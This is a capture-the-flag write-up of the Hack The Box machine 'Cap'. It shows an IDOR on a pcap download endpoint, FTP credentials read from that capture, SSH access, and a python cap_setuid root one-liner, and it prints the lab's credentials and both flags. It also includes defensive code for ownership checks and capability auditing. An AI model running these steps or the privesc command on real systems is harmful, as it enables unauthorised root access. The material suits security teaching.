
# Cap

<figure><img src="/files/1slVIzv1RcN0uvjMLzi9" alt=""><figcaption></figcaption></figure>

## TARGET IP: 10.10.10.245

## HOST IP: 10.10.16.3

## RECON

### WEBSITE

```url
http://[TARGET IP]
```

<figure><img src="/files/jqqHlhd9jovpvLhmptz5" alt=""><figcaption></figcaption></figure>

* Looks like a data analytics page that I am currently signed into as `Nathan`.
* The dropdown menu under the user doesn't do anything; none of the buttons, including `Logout`, point anywhere or do anything.
* Take a look at the source code:

```html
   <!-- offset area start -->
    <div class="offset-area">
        <div class="offset-close"><i class="ti-close"></i></div>
        <ul class="nav offset-menu-tab">
            <li><a class="active" data-toggle="tab" href="#activity">Activity</a></li>
            <li><a data-toggle="tab" href="#settings">Settings</a></li>
        </ul>
            <div id="activity" class="tab-pane fade in show active">
                <div class="recent-activity">
                    <div class="timeline-task">
                        <div class="icon bg1">
                            <i class="fa fa-envelope"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Rashed sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg2">
                            <i class="fa fa-check"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Added</h4>
                            <span class="time"><i class="ti-time"></i>7 Minutes Ago</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg2">
                            <i class="fa fa-exclamation-triangle"></i>
                        </div>
                        <div class="tm-title">
                            <h4>You missed you Password!</h4>
                            <span class="time"><i class="ti-time"></i>09:20 Am</span>
                        </div>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg3">
                            <i class="fa fa-bomb"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Member waiting for you Attention</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg3">
                            <i class="ti-signal"></i>
                        </div>
                        <div class="tm-title">
                            <h4>You Added Kaji Patha few minutes ago</h4>
                            <span class="time"><i class="ti-time"></i>01 minutes ago</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg1">
                            <i class="fa fa-envelope"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Ratul Hamba sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Hello sir , where are you, i am egerly waiting for you.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg2">
                            <i class="fa fa-exclamation-triangle"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Rashed sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg2">
                            <i class="fa fa-exclamation-triangle"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Rashed sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg3">
                            <i class="fa fa-bomb"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Rashed sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                    <div class="timeline-task">
                        <div class="icon bg3">
                            <i class="ti-signal"></i>
                        </div>
                        <div class="tm-title">
                            <h4>Rashed sent you an email</h4>
                            <span class="time"><i class="ti-time"></i>09:35</span>
                        </div>
                        <p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
                        </p>
                    </div>
                </div>
            </div>
            <div id="settings" class="tab-pane fade">
                <div class="offset-settings">
                    <h4>General Settings</h4>
                    <div class="settings-list">
                        <div class="s-settings">
                            <div class="s-sw-title">
                                <h5>Notifications</h5>
                                <div class="s-swtich">
                                    <input type="checkbox" id="switch1" />
                                    <label for="switch1">Toggle</label>
                                </div>
                            </div>
                            <p>Keep it 'On' When you want to get all the notification.</p>
                        </div>
                        <div class="s-settings">
                            <div class="s-sw-title">
                                <h5>Show recent activity</h5>
                                <div class="s-swtich">
                                    <input type="checkbox" id="switch2" />
                                    <label for="switch2">Toggle</label>
                                </div>
                            </div>
                            <p>The for attribute is necessary to bind our custom checkbox with the input.</p>
                        </div>
                        <div class="s-settings">
                            <div class="s-sw-title">
                                <h5>Show your emails</h5>
                                <div class="s-swtich">
                                    <input type="checkbox" id="switch3" />
                                    <label for="switch3">Toggle</label>
                                </div>
                            </div>
                            <p>Show email so that easily find you.</p>
                        </div>
                        <div class="s-settings">
                            <div class="s-sw-title">
                                <h5>Show Task statistics</h5>
                                <div class="s-swtich">
                                    <input type="checkbox" id="switch4" />
                                    <label for="switch4">Toggle</label>
                                </div>
                            </div>
                            <p>The for attribute is necessary to bind our custom checkbox with the input.</p>
                        </div>
                        <div class="s-settings">
                            <div class="s-sw-title">
                                <h5>Notifications</h5>
                                <div class="s-swtich">
                                    <input type="checkbox" id="switch5" />
                                    <label for="switch5">Toggle</label>
                                </div>
                            </div>
                            <p>Use checkboxes when looking for yes or no answers.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
```

* There is a lot there, but it does give us some new information:
  * We have a user named `Nathan` and possibly other users `Rashed`, `Kaji Patha`, and `Ratul Hamba` (the surrounding Lorem ipsum suggests these may just be names left over from the page template).
* Pulling the response headers with `curl` doesn't reveal the version number of the `gunicorn` web server.

```bash
curl [TARGET IP] -sI
```

<figure><img src="/files/tWQyytZ6RkgS8iOlsTHo" alt=""><figcaption></figcaption></figure>

* If we go to the home tab in the upper right and click on `Network Status`, we get some really good info about the machine without actually having to run an Nmap scan.
  * Looks like ports 21, 22, and 80 are open.

<figure><img src="/files/UF6A9wndZHIXyxIQHLP1" alt=""><figcaption></figcaption></figure>

* When I try something in the search bar, nothing pops up but a parameter is added to the URL.

```url
http://[TARGET IP]/?search=[SEARCHED WORD]#
```

* I captured a packet with Burpsuite and received the following.

<figure><img src="/files/KIxJoyZs9Ojd1iloGkSy" alt=""><figcaption></figcaption></figure>

* Let's try the `Security Snapshot` button. This appears to capture packet data over a 5-second window and produce a `pcap` file to look at.
* We can also see that the URL carries a `data` identifier that equals 1 after the first snapshot and increments with each one, so earlier captures sit at lower numbers. Let's set it to `0` and see what it spits out, and grab that `pcap` file as well.

```url
http://[TARGET IP]/data/0
```
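The sequential `data` identifier with no ownership check is the bug being used here. As an added example that is not part of the original write-up or Cap's real application code, this constructed Python store shows the vulnerable lookup next to two hardened ones (an owner check on the sequential id, and an unguessable token); the store, its method names and the user names are assumptions.

```python
import secrets

class CaptureStore:
    """Constructed stand-in for the app's capture storage (not Cap's real code).
    Records are (owner, pcap_bytes); owner is the user who clicked Security Snapshot."""

    def __init__(self):
        self._by_seq = {}    # sequential id -> record, what /data/<n> exposes
        self._by_token = {}  # random token  -> record, the hardened lookup key
        self._next_seq = 0

    def add(self, owner, pcap):
        seq, self._next_seq = self._next_seq, self._next_seq + 1
        token = secrets.token_urlsafe(16)  # 128 random bits, not enumerable
        self._by_seq[seq] = self._by_token[token] = (owner, pcap)
        return seq, token

    def get_insecure(self, seq):
        # Vulnerable pattern: the id alone is trusted, so any logged-in user can
        # walk /data/0, /data/1, ... and read captures they never made.
        return self._by_seq[seq][1]

    def _owned(self, rec, user):
        # Missing and foreign records get the same error so ids cannot be probed.
        if rec is None or rec[0] != user:
            raise LookupError("capture not found")
        return rec[1]

    def get_checked(self, user, seq):
        # Hardened: the sequential id is honoured only for the record's owner.
        return self._owned(self._by_seq.get(seq), user)

    def get_by_token(self, user, token):
        # Defence in depth: an unguessable key, and still the ownership check.
        return self._owned(self._by_token.get(token), user)


def demo():
    """Replay the walkthrough: an earlier user's capture is id 0, nathan's is id 1."""
    store = CaptureStore()
    earlier_seq, _ = store.add("earlier-user", b"CONSTRUCTED: cleartext FTP login")
    my_seq, my_token = store.add("nathan", b"CONSTRUCTED: nathan's own traffic")
    leaked = store.get_insecure(earlier_seq)  # the IDOR: /data/0 just works
    try:
        store.get_checked("nathan", earlier_seq)
        blocked = False
    except LookupError:
        blocked = True
    return my_seq, leaked, blocked, store.get_by_token("nathan", my_token)
```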

<figure><img src="/files/gjDckCIfapllJI2UKgQg" alt=""><figcaption></figcaption></figure>

* We can open this `pcap` file in wireshark to take a look at it and see if we can find any good information.

<figure><img src="/files/XOa30oiB5SSnI9iuxwjM" alt=""><figcaption></figcaption></figure>

* Scanning through the Wireshark capture, we quickly find FTP credentials for the user `Nathan`, sent in cleartext on the FTP control channel.

<figure><img src="/files/S56lCwKuTI7qpXiLJuls" alt=""><figcaption></figcaption></figure>

```
nathan:Buck3tH4TF0RM3!
```

* We can now log into `nathan`'s account, list out the current working directory, and download the user flag.

```
ftp [TARGET IP]
nathan
Buck3tH4TF0RM3!
ls -la
get user.txt
```

![](/files/ursvUPgtIuAmaliqqc07)

* On our host system we can then look into the text file for the first flag.

```
cat user.txt
```

![](/files/88RwujeDTh5A0zm081Wd)

```
user.txt: 1f896817980ce9dfee4c79c1922c5ae3
```

### WAPPALYZER

<figure><img src="/files/Kyfc1nhIpH83KSDxQelX" alt=""><figcaption></figcaption></figure>

* The backend language appears to be Python.
* It uses Gunicorn as the web server.
  * The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.

### NMAP

```bash
nmap [TARGET IP]
```

<figure><img src="/files/t7dG86UzBTLmAy4tqV2z" alt=""><figcaption></figcaption></figure>

```bash
nmap -A -sV -p 21,22,80 [TARGET IP]
```

<figure><img src="/files/6PhDvFFe2nll0YXJ1Y4p" alt=""><figcaption></figcaption></figure>

```bash
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80
```

<figure><img src="/files/Y8sCDOiAGLPT2QjxeGX2" alt=""><figcaption></figcaption></figure>

## ENUMERATION

### GOBUSTER

#### DIRECTORIES AND VHOSTS

```bash
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/WmoDzY9FknweDiOSejC9" alt=""><figcaption></figcaption></figure>

* None of these are new to me, and they don't provide any new information.

```bash
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt
```

<figure><img src="/files/5XISWCIwlGxXzDhn0tBC" alt=""><figcaption></figcaption></figure>

### TARGET ENUMERATION

* Now that we have credentials for `nathan`, we can spend some time exploring the target system for possible privilege escalation.
* I'm going to use the credentials to log in through `SSH`.

```
ssh nathan@[TARGET IP]
yes
Buck3tH4TF0RM3!
```

<figure><img src="/files/Nbh6KK6ykYXVht6qWzNc" alt=""><figcaption></figcaption></figure>

* Try checking out what sudo privileges we have.

```
sudo -l
Buck3tH4TF0RM3!
```

<figure><img src="/files/lIq3ZGSvAPhdQ00seDsm" alt=""><figcaption></figcaption></figure>

* Unfortunately, we have none, so let's go digging around.
* I spent some time digging around myself but didn't find anything. I decided to upload a copy of LinPEAS to the target account and run its automated enumeration to help out.
* I came across something interesting.

<figure><img src="/files/tAlt4CmWurup7iMzC1G7" alt=""><figcaption></figcaption></figure>

```
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
```

* I can verify the file capabilities with the following command. Capabilities grant a binary specific pieces of root's power without making it fully SUID; `cap_setuid` is the piece that lets a process change its UID, which in practice is just as good as root.

```bash
getcap -r / 2>/dev/null
```

<figure><img src="/files/WGPsHXbl7PJCQV1lBOPn" alt=""><figcaption></figcaption></figure>

* This is great information: a scripting interpreter such as Python with `cap_setuid` in its effective and permitted sets is a particularly vulnerable situation, because anyone who can run it can call `setuid(0)` from their own script.
* [Hacktricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities) and [GTFOBins](https://gtfobins.github.io/gtfobins/python/#capabilities) both have sections on using this for privilege escalation.
* Let's go with the privilege escalation from GTFOBins.

```bash
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```
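To check for this class of finding on your own hosts, the added example below (mine, not from the write-up, LinPEAS or GTFOBins) parses `getcap -r /` output in both libcap styles and flags dangerous capability bits, ranking script interpreters first; the `DANGEROUS` set and the `INTERPRETER` pattern are my assumptions and the `SAMPLE` output is constructed, with the python3.8 line taken from what was found on Cap.

```python
import os
import re
from typing import NamedTuple

# Capabilities that let a process reach root or bypass DAC when the binary is
# one an unprivileged user can drive (cap_setuid is the one Cap ships on python3.8).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
INTERPRETER = re.compile(r"^(python|perl|ruby|php|node|lua)[0-9.]*$")

class CapEntry(NamedTuple):
    path: str
    caps: frozenset
    flags: str  # subset of "eip": effective, inheritable, permitted

def parse_getcap_line(line):
    """Parse both getcap styles: 'PATH = caps+eip' (libcap < 2.41) and 'PATH caps=eip'."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, spec = line.split(" = ", 1)
        names, _, flags = spec.rpartition("+")
    else:
        path, spec = line.rsplit(" ", 1)
        names, _, flags = spec.partition("=")
    return CapEntry(path, frozenset(c for c in names.split(",") if c), flags)

def audit(getcap_output):
    """Return (path, dangerous caps, is_interpreter) for risky entries, interpreters
    first: a scripting runtime with cap_setuid is root for anyone who can run it.
    Remediation is `setcap -r PATH` (or run the service as a dedicated user)."""
    findings = []
    for line in getcap_output.splitlines():
        entry = parse_getcap_line(line)
        if entry is None:
            continue
        bad = sorted(entry.caps & DANGEROUS)
        if bad and "p" in entry.flags:  # only the permitted set reaches the process
            is_interp = bool(INTERPRETER.match(os.path.basename(entry.path)))
            findings.append((entry.path, bad, is_interp))
    return sorted(findings, key=lambda f: not f[2])

# Constructed sample; the python3.8 line is what LinPEAS reported on Cap.
SAMPLE = """/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
"""

if __name__ == "__main__":  # on a live host, feed it the output of: getcap -r / 2>/dev/null
    for path, caps, interp in audit(SAMPLE):
        print(("CRITICAL " if interp else "WARN ") + path + ": " + ",".join(caps))
```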

![](/files/1ScMOvea7zA49iuIsl6K)

* And now I have root privileges.
* Let's go get the root flag.

```
cat /root/root.txt
```

![](/files/Put8wzE66Uur4HcuCST4)

```
ca9be49e3fbed8b6be99a27bcd9be60f
```
